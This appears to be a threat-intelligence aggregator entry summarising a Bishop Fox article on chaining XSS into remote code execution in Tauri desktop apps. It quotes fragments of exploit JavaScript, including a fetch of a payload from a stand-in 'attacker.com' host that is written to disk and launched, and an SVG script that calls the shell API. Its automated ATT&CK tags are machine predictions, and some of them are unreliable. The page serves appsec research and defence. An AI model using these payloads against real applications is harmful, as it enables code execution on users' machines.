TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Bishop Fox

Beyond Electron: Attacking Alternative Desktop Application Frameworks

2026-03-03 · Read original ↗

ATT&CK techniques detected

6 predictions
T1055.001Dynamic-link Library Injection
69%
"extracted, we can now construct the full path to our writable directory : const apppath = ` / users / $ { username } / library / application support / < app - name > / ` ; generating the malicious payload the following step creates an executable that will be launched via shell. o…"
T1059.004Unix Shell
57%
"> shell. open < / strong > ( ) - opens paths or urls using the system ' s default handler - a permissive filesystemscope - defines where files can be written when all three are present, an attacker with an xss vulnerability has everything needed to achieve remote code execution. …"
T1055.012Process Hollowing
53%
"window. _ _ tauri _ _. fs. writebinaryfile ( " p. txt ", new uint8array ( [ 80 ] ), { dir : 3 } ). then ( ( ) = > alert ( " fonts is writable " ) ). catch ( e = > { username = e. split ( " / " ) [ 2 ] } ) fetch ( ' https : / / attacker. com / payload. macho ' ). then ( res = > re…"
T1059.004Unix Shell
44%
"script > import ( ' https : / / cdn. jsdelivr. net / npm / @ tauri - apps / [ email protected ] / + esm ' ). then ( m = > module = m ) module. shell. open ( ' / system / applications / calculator. app ' ) < / script > ] ] > < / svg > this successfully executes calculator, proving…"
T1059.006Python
42%
"script > import ( ' https : / / cdn. jsdelivr. net / npm / @ tauri - apps / [ email protected ] / + esm ' ). then ( m = > module = m ) module. shell. open ( ' / system / applications / calculator. app ' ) < / script > ] ] > < / svg > this successfully executes calculator, proving…"
T1204.002Malicious File
35%
"xss " ) < / script > ] ] > < / svg > after typing the above into the editor, the popup confirmed arbitrary javascript was being executed. now we need to find how to achieve code execution in the application ' s security context, with access to the tauri api. from xss to remote co…"

Summary

Tauri promises a lighter, security-first future beyond Electron—but does it actually reduce risk? Carlos Yanez uncovers how XSS and permissive configs can still be chained into RCE, walking through real-world exploitation techniques every appsec team should understand.